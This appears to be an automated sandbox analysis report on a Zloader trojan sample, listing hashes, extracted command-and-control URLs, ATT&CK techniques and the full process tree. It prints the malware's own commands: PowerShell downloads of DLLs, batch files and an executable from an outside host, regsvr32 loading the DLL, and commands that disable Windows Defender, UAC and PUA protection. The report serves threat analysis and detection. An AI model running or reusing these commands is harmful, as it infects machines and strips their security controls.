zloader | 197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb

Analysis

max time kernel
63s
max time network
139s
platform
windows10_x64
resource
win10v20210410
submitted
15-08-2021 08:11

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

397eb08dc1794600fdd0c4744c2aeb12.exe
Size

165KB
MD5

397eb08dc1794600fdd0c4744c2aeb12
SHA1

5e7b7419c58ed1322917144efaa1b6ba87086b67
SHA256

197473ef9099e43c74fc5dd19776cb4e001ccd39102c38c3bfa3f81db9fd92bb
SHA512

669b705f38b7614e14957368048c590a82673c52c8281d3bd0c3d4d77f398d4f65fbbccc3a1e284579149432e26942e3b52df8876d83267f0ac4fc8974b94e69

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1120 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2628 regsvr32.exe

flow	pid	process
7	1120	powershell.exe

pid	process
2628	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

397eb08dc1794600fdd0c4744c2aeb12.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	397eb08dc1794600fdd0c4744c2aeb12.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	397eb08dc1794600fdd0c4744c2aeb12.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1120 powershell.exe
1120 powershell.exe
1120 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1120 powershell.exe

pid	process
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1120	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

397eb08dc1794600fdd0c4744c2aeb12.execmd.exeregsvr32.exe

description	pid	process	target process
PID 3904 wrote to memory of 1272	3904	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 3904 wrote to memory of 1272	3904	397eb08dc1794600fdd0c4744c2aeb12.exe	cmd.exe
PID 1272 wrote to memory of 1120	1272	cmd.exe	powershell.exe
PID 1272 wrote to memory of 1120	1272	cmd.exe	powershell.exe
PID 1272 wrote to memory of 1864	1272	cmd.exe	regsvr32.exe
PID 1272 wrote to memory of 1864	1272	cmd.exe	regsvr32.exe
PID 1864 wrote to memory of 2628	1864	regsvr32.exe	regsvr32.exe
PID 1864 wrote to memory of 2628	1864	regsvr32.exe	regsvr32.exe
PID 1864 wrote to memory of 2628	1864	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe
"C:\Users\Admin\AppData\Local\Temp\397eb08dc1794600fdd0c4744c2aeb12.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaN.dll -OutFile JavaN.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\system32\regsvr32.exe
regsvr32 JavaN.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\SysWOW64\regsvr32.exe
JavaN.dll
4⤵
- Loads dropped DLL
PID:2628

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:1584

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:3520

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:3056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:2720

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:3472

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:3536

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:4000

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
aab01f3941f75168a245107a1aef0282

SHA1
f8991da1d88099372a63d834a130437c98f83750

SHA256
31d5fa13b3390bf9fca043e7197aed0b84f4ee85ba3b6a5cf215d532f280120b

SHA512
8a563e73007640f2d7ea74a318ab6537af6d7f7f08295dcba9af6df1936d2d4ec3d37af21de260acc3f395507beb02bd0dde5fec0819ce3f457a19901023cdbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9a470b296e14625513006653998f7097

SHA1
5c8ca3e70ebb66184f354a1aa4cbf0dcc21d7750

SHA256
ab5953d6f755b9ee73a74760755671df3d8c2c679e96c3635649a9b4c9ec0945

SHA512
8674043dfc5b79c45a93bea7247c3339f0cfbf93867fbb6e76ad5619e48b545cb761cc0690a55e2e5f284a9d15103056d14a6d0ad703c83264fc6fbf5cd2e885

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3900759434781759e225efbdaaaaea14

SHA1
f51176254463c68b9eee4814fcb3f91882a20a21

SHA256
f7dec135b7844ad4c2b95220b3f0e313108df9c0c02098f0889ac955dea57779

SHA512
2f9b2c456eb60222f21e12fe0626295b7f8fcc063edfc2037d6aef484f0e17426fca00aedb0b87682591315426aff77ac20311a5e9c0fa9f1c680cdcf32c0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a680f3f01395df84fb166a4a8a1762db

SHA1
76e9c3440428652fafbecb5b617857a49289884a

SHA256
c8da76bd27be31f07c842ae7a148868c09b34c6223c014259bdc3bc4f4fd8894

SHA512
a3b3a2ce78f73a5d2f9c76c2a89bb130af88e5167a0a4be71c39535ab08bacfa2c19c4d1c64e5fcab4b942a0fa32b769ab4e4b5451a70893b2d1f1f480bc5069

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
179698e226057c1527bd464024b73943

SHA1
ee3790b1a7f701c6df45cff9a9cab6ab0fc04fe4

SHA256
aa70345ca2b9ebd377767c87994591197c2672516234ecb3b0135f96afe7704f

SHA512
35fc5ded1e16dc3652fc3a2e47b6383604f91b1128ff7b7d41216ecebfcba0d1de397272a15a58803ea655d6f9fb195a9f50eb50f85f60555af055540e26de2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
e19a61e9b27aaa153d4349fd3ae1eab7

SHA1
40270d03db738df8e1ada6d4af83758e13b16a5f

SHA256
548734b528695841401ad73a76496355483ff5c51967a846cb4d6e51e04f03fc

SHA512
7ad1f90497ced0f288d846ef4d37aca98df54ae0fd5501be60bd691f8cb40cd752f652e9d1785cf26865266533207e5a4cd6dd339ce6f6d564c4557f965790c6

Download Submit
C:\Users\Admin\AppData\Roaming\JavaN.dll
MD5
01e37eb89bd9cc3211ea5312d77d09e6

SHA1
d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

SHA256
b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

SHA512
f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
6f10d512d4cbb527fd26ae266d0a4aef

SHA1
6e42d51ff2d42c5f999943b329a655e901ea4b32

SHA256
b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943

SHA512
4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e

Download Submit
\Users\Admin\AppData\Roaming\JavaN.dll
MD5
01e37eb89bd9cc3211ea5312d77d09e6

SHA1
d5f5f5d953e1e90cf070dd81b14e4b38499bfc10

SHA256
b4783737e1404098a60fb3896ba6e5f0029d3448b5ab230a44ef07d429910749

SHA512
f1efc04ca7b853ada2f29efb1a417134e07c2ae51fd61301c1e0fa92446d1a0d6f7898b613b5399359e0c04bb4c10151bc62a721f4f5f66f66f1928342814bc9

Download Submit
memory/744-221-0x000001A5B0DB3000-0x000001A5B0DB5000-memory.dmp

Filesize
8KB

Download
memory/744-223-0x000001A5B0DB6000-0x000001A5B0DB8000-memory.dmp

Filesize
8KB

Download
memory/744-220-0x000001A5B0DB0000-0x000001A5B0DB2000-memory.dmp

Filesize
8KB

Download
memory/744-201-0x0000000000000000-mapping.dmp

Download
memory/1044-162-0x0000000000850000-0x0000000000876000-memory.dmp

Filesize
152KB

Download
memory/1044-143-0x0000000000000000-mapping.dmp

Download
memory/1120-135-0x0000023F46DE6000-0x0000023F46DE8000-memory.dmp

Filesize
8KB

Download
memory/1120-127-0x0000023F46DE3000-0x0000023F46DE5000-memory.dmp

Filesize
8KB

Download
memory/1120-125-0x0000023F5FC30000-0x0000023F5FC31000-memory.dmp

Filesize
4KB

Download
memory/1120-126-0x0000023F46DE0000-0x0000023F46DE2000-memory.dmp

Filesize
8KB

Download
memory/1120-121-0x0000023F46DF0000-0x0000023F46DF1000-memory.dmp

Filesize
4KB

Download
memory/1120-116-0x0000000000000000-mapping.dmp

Download
memory/1272-114-0x0000000000000000-mapping.dmp

Download
memory/1584-163-0x00000215E8670000-0x00000215E8672000-memory.dmp

Filesize
8KB

Download
memory/1584-164-0x00000215E8673000-0x00000215E8675000-memory.dmp

Filesize
8KB

Download
memory/1584-165-0x00000215E8676000-0x00000215E8678000-memory.dmp

Filesize
8KB

Download
memory/1584-146-0x0000000000000000-mapping.dmp

Download
memory/1864-137-0x0000000000000000-mapping.dmp

Download
memory/2628-141-0x0000000002B90000-0x0000000002B91000-memory.dmp

Filesize
4KB

Download
memory/2628-139-0x0000000000000000-mapping.dmp

Download
memory/2628-142-0x0000000010000000-0x000000001015D000-memory.dmp

Filesize
1.4MB

Download
memory/2648-225-0x0000000000000000-mapping.dmp

Download
memory/2648-256-0x000002DE5C7F6000-0x000002DE5C7F8000-memory.dmp

Filesize
8KB

Download
memory/2648-239-0x000002DE5C7F3000-0x000002DE5C7F5000-memory.dmp

Filesize
8KB

Download
memory/2648-238-0x000002DE5C7F0000-0x000002DE5C7F2000-memory.dmp

Filesize
8KB

Download
memory/2720-173-0x0000000000000000-mapping.dmp

Download
memory/2720-192-0x000001EFE0706000-0x000001EFE0708000-memory.dmp

Filesize
8KB

Download
memory/2720-184-0x000001EFE0703000-0x000001EFE0705000-memory.dmp

Filesize
8KB

Download
memory/2720-182-0x000001EFE0700000-0x000001EFE0702000-memory.dmp

Filesize
8KB

Download
memory/2812-199-0x0000000000000000-mapping.dmp

Download
memory/3056-172-0x0000000000000000-mapping.dmp

Download
memory/3472-197-0x0000000000000000-mapping.dmp

Download
memory/3520-170-0x0000000000000000-mapping.dmp

Download
memory/3536-243-0x0000000000000000-mapping.dmp

Download
memory/3536-257-0x00000183F36B0000-0x00000183F36B2000-memory.dmp

Filesize
8KB

Download
memory/3536-258-0x00000183F36B3000-0x00000183F36B5000-memory.dmp

Filesize
8KB

Download
memory/3536-279-0x00000183F36B6000-0x00000183F36B8000-memory.dmp

Filesize
8KB

Download
memory/3536-286-0x00000183F36B8000-0x00000183F36B9000-memory.dmp

Filesize
4KB

Download
memory/4000-285-0x0000000000000000-mapping.dmp

Download